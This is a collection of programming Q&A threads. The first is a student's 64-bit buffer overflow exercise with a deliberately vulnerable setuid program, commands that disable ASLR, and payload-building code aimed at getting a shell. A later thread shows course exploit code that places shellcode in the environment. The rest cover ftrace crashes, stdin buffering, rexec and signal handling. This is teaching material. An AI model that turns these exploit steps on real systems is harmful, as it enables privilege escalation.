Why does my RIP value change after overwriting via an overflow?

I've been working on a buffer overflow on a 64-bit Linux machine for the past few days. The code I'm attacking takes in a file. The original homework ran on a 32-bit system, so a lot differs. I thought I'd run with it and try to learn something new along the way. I disabled ASLR with sudo sysctl -w kernel.randomize_va_space=0 and compiled the program below with gcc -o stack -z execstack -fno-stack-protector stack.c && chmod 4755 stack:
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];
    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}
I could get it to crash by making a file with 20 "A"s. I made a small script to help.
#!/usr/bin/bash
python -c 'print("A"*20)' | tr -d "\n" > badfile
So now, if I add 6 "B"s to the mix, after hitting the SIGSEGV in gdb I get:
RIP: 0x424242424242 ('BBBBBB')
0x0000424242424242 in ?? ()
Perfect! Now we can play with the RIP and put our address in for it to jump to! This is where I'm getting a little confused.
I added some C's to the script to try to find a good address to jump to:
python -c 'print("A"*20 + "B"*6 + "C"*32)' | tr -d "\n" > badfile
After creating the file and getting the SIGSEGV, my RIP address is no longer our B's:
RIP: 0x55555555518a (<bof+37>: ret)
Stopped reason: SIGSEGV
0x000055555555518a in bof (
str=0x7fffffffe900 'C' <repeats 14 times>)
at stack.c:16
I thought this might be due to using B's, so I went ahead and tried to find an address. I then ran x/100 $rsp in gdb, but the output looks completely different than it did before the C's:
# Before Cs
0x7fffffffe8f0: 0x00007fffffffec08 0x0000000100000000
0x7fffffffe900: 0x4141414141414141 0x4141414141414141
0x7fffffffe910: 0x4242424241414141 0x0000000000004242
# After Cs
0x7fffffffe8e8: "BBBBBB", 'C' <repeats 32 times>
0x7fffffffe90f: "AAAAABBBBBB", 'C' <repeats 32 times>
0x7fffffffe93b: ""
I've been trying to understand why this is happening. I know that after this I can supply an address plus code to get a shell, like so:
python -c 'print("NOPs"*20 + "address" + "shellcode")' | tr -d "\n" > badfile
The only thing that has come to mind is the buffer size, but I'm not too sure. Any help would be great. Working through this on my own has taught me a lot; I'm just dying to create a working exploit!
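For concreteness, here is a minimal sketch, in C like the rest of this post, of how the badfile could be assembled once a target address is chosen. The 20-byte offset to the saved return address is an assumption taken from the "A"*20 + "B"*6 experiment above, and the target address and shellcode are placeholders:
/* build_badfile.c - hypothetical sketch, not a working exploit. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

int main(void)
{
    unsigned char payload[517];

    memset(payload, 0x90, sizeof(payload));        /* fill with NOPs (0x90) */

    uint64_t target = 0x00007fffffffe900ULL;       /* placeholder: pick from gdb */
    memcpy(payload + 20, &target, sizeof(target)); /* overwrite saved RIP (little-endian) */

    /* shellcode bytes would go after the return address, e.g.
       memcpy(payload + 28, shellcode, shellcode_len); */

    FILE *f = fopen("badfile", "wb");
    if (!f) { perror("fopen"); return 1; }
    fwrite(payload, 1, sizeof(payload), f);
    fclose(f);
    return 0;
}
Note that user-space addresses on x86-64 have their top two bytes zero, which is consistent with the 0x0000424242424242 value that showed up in RIP earlier.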

Related

ftrace: system crash when changing current_tracer from function_graph via echo

I have been playing with ftrace recently to monitor some behavior characteristics of my system. I've been handling switching the trace on and off via a small script. After running the script, my system would crash and reboot itself. Initially, I believed there might be an error with the script itself, but I have since determined that the crash and reboot are the result of echoing some tracer to /sys/kernel/debug/tracing/current_tracer when current_tracer is set to function_graph.
That is, the following sequence of commands will produce the crash/reboot:
echo "function_graph" > /sys/kernel/debug/tracing/current_tracer
echo "function" > /sys/kernel/debug/tracing/current_tracer
During the reboot after the crash caused by the above echo statements, I see a lot of output that reads:
clearing orphaned inode <inode>
I tried to reproduce this problem by switching current_tracer from function_graph to something else in a C program:
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

int openCurrentTracer()
{
    int fd = open("/sys/kernel/debug/tracing/current_tracer", O_WRONLY);
    if (fd < 0)
        exit(1);
    return fd;
}

int writeTracer(int fd, char* tracer)
{
    if (write(fd, tracer, strlen(tracer)) != strlen(tracer)) {
        printf("Failure writing %s\n", tracer);
        return 0;
    }
    return 1;
}

int main(int argc, char* argv[])
{
    int fd = openCurrentTracer();

    char* blockTracer = "blk";
    if (!writeTracer(fd, blockTracer))
        return 1;
    close(fd);

    fd = openCurrentTracer();
    char* graphTracer = "function_graph";
    if (!writeTracer(fd, graphTracer))
        return 1;
    close(fd);

    printf("Preparing to fail!\n");

    fd = openCurrentTracer();
    if (!writeTracer(fd, blockTracer))
        return 1;
    close(fd);

    return 0;
}
Oddly enough, the C program does not crash my system.
I originally encountered this problem while using Ubuntu (Unity environment) 16.04 LTS and confirmed it to be an issue on the 4.4.0 and 4.5.5 kernels. I have also tested this issue on a machine running Ubuntu (Mate environment) 15.10, on the 4.2.0 and 4.5.5 kernels, but was unable to reproduce the issue. This has only confused me further.
Can anyone give me insight on what is happening? Specifically, why would I be able to write() but not echo to /sys/kernel/debug/tracing/current_tracer?
Update
As vielmetti pointed out, others have had a similar issue (as seen here).
The ftrace_disable_ftrace_graph_caller() modifies the jmp instruction at
ftrace_graph_call assuming it's a 5-byte near jmp (e9 <offset>).
However it's a short jmp consisting of 2 bytes only (eb <offset>). And
ftrace_stub() is located just below the ftrace_graph_caller so the
modification above breaks the instruction, resulting in a kernel oops on
the ftrace_stub() with an invalid opcode like below:
The patch (shown below) solved the echo issue, but I still do not understand why echo was breaking previously when write() was not.
diff --git a/arch/x86/kernel/mcount_64.S b/arch/x86/kernel/mcount_64.S
index ed48a9f465f8..e13a695c3084 100644
--- a/arch/x86/kernel/mcount_64.S
+++ b/arch/x86/kernel/mcount_64.S
@@ -182,7 +182,8 @@ GLOBAL(ftrace_graph_call)
 	jmp ftrace_stub
 #endif
 
-GLOBAL(ftrace_stub)
+/* This is weak to keep gas from relaxing the jumps */
+WEAK(ftrace_stub)
 	retq
 END(ftrace_caller)
via https://lkml.org/lkml/2016/5/16/493
Looks like you are not the only person to notice this behavior. I see
https://lkml.org/lkml/2016/5/13/327
as a report of the problem, and
https://lkml.org/lkml/2016/5/16/493
as a patch to the kernel that addresses it. Reading through that whole thread, it appears the issue comes down to assembler optimization: gas relaxes the 5-byte near jump into a 2-byte short jump, as the comment in the patch above notes.
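To make the quoted mechanism concrete, here is a toy user-space sketch (hypothetical bytes, not kernel code). A patcher that assumes a 5-byte near jmp (e9 + rel32) rewrites five bytes, but gas actually emitted a 2-byte short jmp (eb + rel8), so the bytes that follow it, here the retq of ftrace_stub, get clobbered:
/* jmp_patch_demo.c - toy illustration of the bug described above. */
#include <stdio.h>
#include <string.h>

int main(void)
{
    /* what gas actually emitted: a 2-byte short jmp, immediately
       followed by ftrace_stub's retq (0xc3) */
    unsigned char text[] = { 0xeb, 0x05,    /* jmp ftrace_stub (short form) */
                             0xc3,          /* ftrace_stub: retq            */
                             0x90, 0x90 };  /* padding                      */

    /* the patcher assumes a 5-byte near jmp and rewrites 5 bytes... */
    const unsigned char near_jmp[5] = { 0xe9, 0x00, 0x00, 0x00, 0x00 };
    memcpy(text, near_jmp, sizeof(near_jmp));

    /* ...so the retq at offset 2 is gone: executing ftrace_stub now
       hits a garbage byte, the "invalid opcode" oops from the report */
    printf("byte at ftrace_stub: 0x%02x (was 0xc3, retq)\n", text[2]);
    return 0;
}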

One file input to two program in script

Hi, I have a script that runs two programs:
#Script file
./prog1
./prog2
prog1 is a C program:
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv){
    printf("prog1 running\n");
    int tmp;
    scanf("%d", &tmp);
    printf("%d\n", tmp+10);
    printf("prog1 ended\n");
    return 0;
}
prog2 is a C program as well:
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv){
    printf("prog2 running\n");
    int tmp;
    scanf("%d\n", &tmp);
    printf("%d\n", tmp+10);
    printf("prog2 ended\n");
    return 0;
}
I run the command
./script < file
where file is
123
456
The output is
prog1 running
133
prog1 ended
prog2 running
10
prog2 ended
It seems like prog2 did not get the input from the file. What is happening under the hood? Could it be that prog2 read the "\n" instead of a number?
Your script should be this:
#!/bin/bash
exec 3<&1
tee >(./prog2 >&3) | ./prog1
This uses the tee command to duplicate stdin and the newer >( ) bash feature (process substitution) to open a temporary file descriptor. (File descriptor 3 is opened so that prog2's output can be routed back to the original stdout instead of into the pipe.)
See this answer to read the whole story.
scanf reads buffered input. So when your first program reads from stdin, the C library speculatively reads ahead all of the available input to make future reads from stdin faster (by avoiding many small system calls). When the second program runs, there is no input left, and (since you failed to check the result of scanf()) you end up with 0 in tmp.
You should be able to modify the buffering strategy in your application (at the expense of speed) using the setvbuf() standard function.
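For example, here is a sketch of prog1 with the read-ahead disabled (this assumes the usual glibc behavior that an unbuffered input stream reads only the bytes it needs), which leaves the second line in the pipe for prog2:
#include <stdio.h>

int main(int argc, char **argv){
    /* _IONBF: stdin is unbuffered, so scanf consumes only the bytes
       it needs instead of slurping the whole pipe */
    setvbuf(stdin, NULL, _IONBF, 0);

    printf("prog1 running\n");
    int tmp;
    if (scanf("%d", &tmp) != 1)   /* also check the result, as noted above */
        return 1;
    printf("%d\n", tmp + 10);
    printf("prog1 ended\n");
    return 0;
}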

Computing memory address of the environment within a process

I got the following code from the lecture slides of a security course.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

extern char shellcode;

#define VULN "./vuln"

int main(int argc, char **argv) {
    void *addr = (char *) 0xc0000000 - 4
                 - (strlen(VULN) + 1)
                 - (strlen(&shellcode) + 1);
    fprintf(stderr, "Using address: 0x%p\n", addr);

    // some other stuff

    char *params[] = { VULN, buf, NULL };
    char *env[] = { &shellcode, NULL };
    execve(VULN, params, env);
    perror("execve");
}
This code calls a vulnerable program with the shellcode in its environment. The shellcode is some assembly code in an external file that opens a shell, and VULN defines the name of the vulnerable program.
My question: how is the shellcode address computed?
The addr variable holds the address of the shellcode (which is part of the environment). Can anyone explain to me how this address is determined? So:
Where does the 0xc0000000 - 4 come from?
Why are the lengths of the shellcode and the program name subtracted from it?
Note that both this code and the vulnerable program are compiled like this:
$ CFLAGS="-m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=2"
$ cc $CFLAGS -o vuln vuln.c
$ cc $CFLAGS -o exploit exploit.c shellcode.s
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
So address space randomization is turned off.
My understanding is that the stack is at the very top of the process's address space (highest memory addresses), and that it contains, in this order:
The environment data.
argv
argc
the return address of main
the framepointer
local variables in main
...etc...
Constants and global data are not stored on the stack; that's why I also don't understand why the length of the VULN constant influences the address at which the shellcode is placed.
Hope you can clear this up for me :-)
Note that we're working on a Unix system on an Intel x86 architecture.
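For reference, a small probe program can show where the environment strings actually land; this is just a sketch (the file name is made up), built 32-bit with the same flags and with ASLR off:
/* layout_probe.c - inspect the top-of-stack layout.
 * Build like the exploit: cc -m32 -o layout_probe layout_probe.c */
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv, char **envp)
{
    int i;

    printf("argv[0] = %p (\"%s\")\n", (void *)argv[0], argv[0]);
    for (i = 0; envp[i] != NULL; i++)
        printf("envp[%d] = %p (len %u)\n",
               i, (void *)envp[i], (unsigned)strlen(envp[i]));
    return 0;
}
If the classic layout holds (a NULL word at the very top of the stack, then the file name of the program, then the environment strings), running it with a single-entry environment should print an envp[0] equal to 0xc0000000 - 4 - (strlen(name) + 1) - (strlen(env0) + 1), which is exactly what the exploit computes.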

Random errors when using rexec

I have a very odd error when using rexec. The code is very simple; I am just calling rexec in a loop:
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
#include <unistd.h>

int main() {
    char buffData[1024];
    int i;
    char *l_ahost = "cwp01";
    struct servent *l_servInfo = getservbyname("exec", "tcp");

    for (i = 0; i < 2000; i++) {
        int err = rexec(&l_ahost, l_servInfo->s_port, NULL, NULL, "echo -n .", NULL);
        if (err <= 0) {
            perror("Rexec error");
        } else {
            if (read(err, buffData, 1024) > 0)
                printf("'%c' %d\n", *buffData, i);
            close(err);
        }
    }
    return 0;
}
The output is:
muftak : > gcc tst_rexec.c ; ./a.out
'.' 0
'.' 1
'.' 2
'.' 3
'.' 4
...
'.' 47
'.' 48
'.' 49
cwp01.eurocontrol.fr: Connection reset by peer
Rexec error: Illegal seek
'.' 51
'.' 52
'.' 53
'.' 54
...
Why does rexec work correctly almost always, but not always? Non-deterministic behaviour for such a simple case disturbs me a lot. I have no clue where to search for an explanation (except Stack Overflow, of course).
I am using Red Hat Enterprise Linux Server release 5.8 (Tikanga)
I don't know that much about TCP and even less about rexec. Have you tried the command version yet? Your code suggests you could use rexec(1) as opposed to rexec(3).
Good luck.
First, you should read the man page for rexec to know why you must not use it.
Second, "non determinist behaviour" is quite common in network programming (and it is a big difference with local programming and a reason why fully distributed systems, where you do not even know that code is run remotely, is very hard to achieve). From the error message, it looks like the server cwp01.eurocontrol.fr simply rebooted during your test.

Externally disabling signals for a Linux program

On Linux, is it possible to somehow disable signaling for programs externally... that is, without modifying their source code?
Context:
I'm calling a C (and also a Java) program from within a bash script on Linux. I don't want any interruptions for my bash script, and for the other programs that the script launches (as foreground processes).
While I can use a...
trap '' INT
... in my bash script to disable the Ctrl C signal, this works only while program control happens to be in the bash code itself. That is, if I press Ctrl C while the C program is running, the C program gets interrupted and exits! This C program is performing a critical operation, which is why I don't want it to be interrupted. I don't have access to the source code of this C program, so signal handling inside the C program is out of the question.
#!/bin/bash
trap 'echo You pressed Ctrl C' INT
# A C program to emulate a real-world, long-running program,
# which I don't want to be interrupted, and for which I
# don't have the source code!
#
# File: y.c
# To build: gcc -o y y.c
#
# #include <stdio.h>
# int main(int argc, char *argv[]) {
# printf("Performing a critical operation...\n");
# for(;;); // Do nothing forever.
# printf("Performing a critical operation... done.\n");
# }
./y
Regards,
/HS
The process signal mask is inherited across exec, so you can simply write a small wrapper program that blocks SIGINT and executes the target:
#include <signal.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
    sigset_t sigs;

    sigemptyset(&sigs);
    sigaddset(&sigs, SIGINT);
    sigprocmask(SIG_BLOCK, &sigs, 0);

    if (argc > 1) {
        execvp(argv[1], argv + 1);
        perror("execvp");
    } else {
        fprintf(stderr, "Usage: %s <command> [args...]\n", argv[0]);
    }
    return 1;
}
If you compile this program to noint, you would just execute ./noint ./y.
As ephemient notes in comments, the signal disposition is also inherited, so you can have the wrapper ignore the signal instead of blocking it:
#include <signal.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
    struct sigaction sa = { 0 };

    sa.sa_handler = SIG_IGN;
    sigaction(SIGINT, &sa, 0);

    if (argc > 1) {
        execvp(argv[1], argv + 1);
        perror("execvp");
    } else {
        fprintf(stderr, "Usage: %s <command> [args...]\n", argv[0]);
    }
    return 1;
}
(and of course for a belt-and-braces approach, you could do both).
The "trap" command is local to this process, never applies to children.
To really trap the signal, you have to hack it using an LD_PRELOAD hook. This is a non-trivial task (you have to compile a loadable shared object with _init() and sigaction() inside), so I won't include the full code here. You can find an example for SIGSEGV in Phrack Volume 0x0b, Issue 0x3a, Phile #0x03.
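A minimal sketch of such a hook, using a GCC constructor in place of the older _init() (the file name is made up):
/* noint_preload.c - preloaded shim; its constructor runs before main()
 * in the target process and sets SIGINT to be ignored.
 * Build: gcc -fPIC -shared -o noint_preload.so noint_preload.c
 * Use:   LD_PRELOAD=./noint_preload.so ./y */
#include <signal.h>

__attribute__((constructor))
static void ignore_sigint(void)
{
    struct sigaction sa = { 0 };

    sa.sa_handler = SIG_IGN;   /* Ctrl-C is discarded inside the target */
    sigaction(SIGINT, &sa, 0);
}
Note this only sets the initial disposition; a program that installs its own SIGINT handler will override it, which is where hooking sigaction() itself, as in the Phrack article, comes in.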
Alternatively, try the nohup and tail trick:
nohup your_command &
tail -F nohup.out
I would suggest that your C (and Java) application needs rewriting so that it can handle an exception; what happens if it really does need to be interrupted, the power fails, etc.?
If that fails, J-16 is right on the money. Does the user need to interact with the process, or just see the output (do they even need to see the output)?
The solutions explained above did not work for me, even when chaining both of the commands proposed by Caf.
However, I finally succeeded in getting the expected behavior this way:
#!/bin/zsh
setopt MONITOR
TRAPINT() { print AAA }
print 1
( ./child & ; wait)
print 2
If I press Ctrl-C while child is running, the script waits until it exits, then prints AAA and 2. child will not receive any signals.
The subshell is used to prevent the PID from being shown.
And sorry... this is for zsh even though the question is about bash; I do not know bash well enough to provide an equivalent script.
This is example code for re-enabling signals like Ctrl+C in programs that block them.
fixControlC.c
#include <stdio.h>
#include <signal.h>

/* LD_PRELOAD interposer: the target's calls to sigaddset() resolve to
   this stub instead of libc's, so SIGINT never makes it into the set
   of signals the program is about to block. */
int sigaddset(sigset_t *set, int signo) {
    printf("int sigaddset(sigset_t *set=%p, int signo=%d)\n", (void *)set, signo);
    return 0;
}
Compile it:
gcc -fPIC -shared -o fixControlC.so fixControlC.c
Run it:
LD_LIBRARY_PATH=. LD_PRELOAD=fixControlC.so mysqld
